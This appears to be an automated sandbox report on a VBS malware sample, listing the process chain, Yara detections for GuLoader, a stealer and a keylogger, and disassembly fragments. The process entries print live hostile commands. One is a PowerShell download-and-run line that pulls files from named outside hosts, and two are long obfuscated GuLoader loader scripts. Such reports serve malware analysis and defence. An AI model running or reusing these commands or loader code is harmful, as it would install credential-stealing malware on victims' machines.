                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: d3 f5 8c f0 02 82 cc ae c5 7f b7 4d 26 2f 5c ec f1 37 6d d9 1c 4f 30 f8 e6 6d 21 6f 25 35 48 9e 3e 24 d7 43 8a 87 2c 4b 93 c9 9d a0 18 5c f8 e9 b2 7a e0 ee d5 54 f1 3e d4 3c 7f 15 93 5d 4f 03 29 ba a6 54 28 ae 16 8c eb 86 93 b7 02 14 11 84 1d cc 4a 5e 05 0f 05 fd 42 94 37 d7 a9 45 cc b2 48 85 cd bd e3 53 df 24 e0 b8 fd b0 f7 05 ea df 43 e4 f1 a3 01 52 24 2c 5f 32 4e 67 72 35 22 08 43 82 9f aa aa 32 10 49 48 bd a5 9e 15 a5 e5 b7 98 d2 71 40 f5 d3 47 a5 d0 d2 fb 77 62 0f 35 7c 79 60 02 54 e9 58 7e b0 4d f2 e8 78 9c 69 a5 86 46 26 24 70 7a 07 23 3b 6a 04 f9 b4 91 72 2c 53 8f a2 2c 9f ea f3 a8 37 bd 5d 6a bf 7c 7d d8 34 6d 61 6f 5c b1 5f a6 b3 0f c6 ff 25 ab 76 b6 e7 e3 b1 91 c9 89 9f 4a 98 65 47 da 85 c3 64 6f 82 bc bb fb ea 38 62 96 54 78 9f bc 2c e1 71 52
                                                                                                                                                          Data Ascii: M&/\7mO0m!o%5H>$C,K\zT><]O)T(J^B7EHS$CR$,_2Ngr5"C2IHq@Gwb5|y`TX~MxiF&$pz#;jr,S,7]j|}4mao\_%vJeGdo8bTx,qR


                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:06:50:43
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs"
                                                                                                                                                          Imagebase:0x7ff652370000
                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:1
                                                                                                                                                          Start time:06:50:43
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:06:50:43
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:06:50:48
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs"
                                                                                                                                                          Imagebase:0x7ff652370000
                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:06:50:51
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:wmic diskdrive get caption,serialnumber
                                                                                                                                                          Imagebase:0x7ff6daa10000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:06:50:51
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:06:50:52
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RS,yl SEBeE DpTj S,4');Satsstatistikken (Kommaernes ' $ lGSiLHao GbViA Sl C: hFaU VsO E .r .ER,DDreMiSPe= n(RaT PEH SNet U-BepGaaAaTI hSp U$HoH.kVScI ,r.avKrePalUdB EGuV rGCaEPulCaSF E hRInSBe)') ;Satsstatistikken (Kommaernes 'Pi$R,gMeLAfOLgB Ba el .:SeP i ,p MI bnByGFlSAr= p$NoG olSpoEib jaReL A:DibPeAL N GD Fb FuW LF,lTvef RVinGyeNoSOv+ l+D %I $SkI oN.uuSoN c et UuW oFlUKrSBl.frC.ooCiU NStT') ;$Multilobulate=$Inunctuous[$Pipings]}$Affixal=297744;$Unattributive=29554;Satsstatistikken (Kommaernes ' E$skGSaL .oRuBH A,iL ,:s H rYStLFreunrTenHaeFlsHe Ca=C PeG eLatFa-E,CC,oP N At NeS N Jtad j,$.eHFuV ,i HR V.ee BlN B SETivP GR EL LGisJaESpR is');Satsstatistikken (Kommaernes 'U,$ Fg,nlafoAnb,oaAflsk:,aT reAbiP.nIntSl Sa=B M,[SySH yPesVet TeLomRu.HaC soSkn ,v ,e hr StIm]U :Ge:epF trFoo hmSpB .a TsFoeCo6 e4M S BtBorOriSunO,gPo(S $.iHU,y FlSteF ra nSaeNisOp)');Satsstatistikken (Kommaernes 'Lu$ igbolThOn,BNyAChlMo:GuC .UE,a TrPrtKre Tr ,OUnn . Ru=Pr .b[ GSOuyPlS TmieO M e. TCoE,eXInT U. ,e TnHac TOM d BiBonlog K]B :Pr:S a Ms crai ,i,r.TrG EEB.tG.SdutSkrMiiPan og C(Un$BuTSaEh,I.enB tAd)');Satsstatistikken (Kommaernes 'Pu$ eG MLCaoPuBiras,LRv:LiUPaNShDSaeStVZee oLreOBepLgaAaBbiLI eBa=Ok$ aCF U Na HRDoTBeENoRStOD nRe..osA uAsBL,s RtSnr iBlnNogSp( a$V AS.FHefH I.aXAeaglLBo,An$scUsoNHaaCnTHuTH REcifobT u Mt aiNaVOsENy)');Satsstatistikken $Undevelopable;"
                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:06:50:52
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:06:51:05
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RS,yl SEBeE DpTj S,4');Satsstatistikken (Kommaernes ' $ lGSiLHao GbViA Sl C: hFaU VsO E .r .ER,DDreMiSPe= n(RaT PEH SNet U-BepGaaAaTI hSp U$HoH.kVScI ,r.avKrePalUdB EGuV rGCaEPulCaSF E hRInSBe)') ;Satsstatistikken (Kommaernes 'Pi$R,gMeLAfOLgB Ba el .:SeP i ,p MI bnByGFlSAr= p$NoG olSpoEib jaReL A:DibPeAL N GD Fb FuW LF,lTvef RVinGyeNoSOv+ l+D %I $SkI oN.uuSoN c et UuW oFlUKrSBl.frC.ooCiU NStT') ;$Multilobulate=$Inunctuous[$Pipings]}$Affixal=297744;$Unattributive=29554;Satsstatistikken (Kommaernes ' E$skGSaL .oRuBH A,iL ,:s H rYStLFreunrTenHaeFlsHe Ca=C PeG eLatFa-E,CC,oP N At NeS N Jtad j,$.eHFuV ,i HR V.ee BlN B SETivP GR EL LGisJaESpR is');Satsstatistikken (Kommaernes 'U,$ Fg,nlafoAnb,oaAflsk:,aT reAbiP.nIntSl Sa=B M,[SySH yPesVet TeLomRu.HaC soSkn ,v ,e hr StIm]U :Ge:epF trFoo hmSpB .a TsFoeCo6 e4M S BtBorOriSunO,gPo(S $.iHU,y FlSteF ra nSaeNisOp)');Satsstatistikken (Kommaernes 'Lu$ igbolThOn,BNyAChlMo:GuC .UE,a TrPrtKre Tr ,OUnn . Ru=Pr .b[ GSOuyPlS TmieO M e. TCoE,eXInT U. ,e TnHac TOM d BiBonlog K]B :Pr:S a Ms crai ,i,r.TrG EEB.tG.SdutSkrMiiPan og C(Un$BuTSaEh,I.enB tAd)');Satsstatistikken (Kommaernes 'Pu$ eG MLCaoPuBiras,LRv:LiUPaNShDSaeStVZee oLreOBepLgaAaBbiLI eBa=Ok$ aCF U Na HRDoTBeENoRStOD nRe..osA uAsBL,s RtSnr iBlnNogSp( a$V AS.FHefH I.aXAeaglLBo,An$scUsoNHaaCnTHuTH REcifobT u Mt aiNaVOsENy)');Satsstatistikken $Undevelopable;"
                                                                                                                                                          Imagebase:0xd70000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2214210925.0000000008970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2214810117.000000000B9FD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2187855204.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:06:51:05
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:13
                                                                                                                                                          Start time:06:51:17
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o ""
                                                                                                                                                          Imagebase:0x250000
                                                                                                                                                          File size:1'620'872 bytes
                                                                                                                                                          MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:06:51:19
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:06:51:26
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                          Imagebase:0x6a0000
                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2340047272.00000000227E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:06:51:43
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                          Imagebase:0xfa0000
                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2336659742.0000000004D20000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2336254784.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Has exited:false

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FFD9B8B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.3155626951.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                            • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                                                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                            • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FFD9B8AAB26 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 194a17f4bc16a614c9c935a75d9cdf8e8cd6e79162baf011b9dea7d75b97252f
                                                                                                                                                            • Instruction ID: 9ee4a5cb965262f8ef2ea420bbc1d09618af4cb49806efd8544378c3c63b9018
                                                                                                                                                            • Opcode Fuzzy Hash: 194a17f4bc16a614c9c935a75d9cdf8e8cd6e79162baf011b9dea7d75b97252f
                                                                                                                                                            • Instruction Fuzzy Hash: B3F1B530A09A8E8FEBA8DF28C8557F977D1FF58310F04426EE84DC76A5DB3499458B81
                                                                                                                                                            Function 00007FFD9B8AB8D2 Relevance: .5, Instructions: 460COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
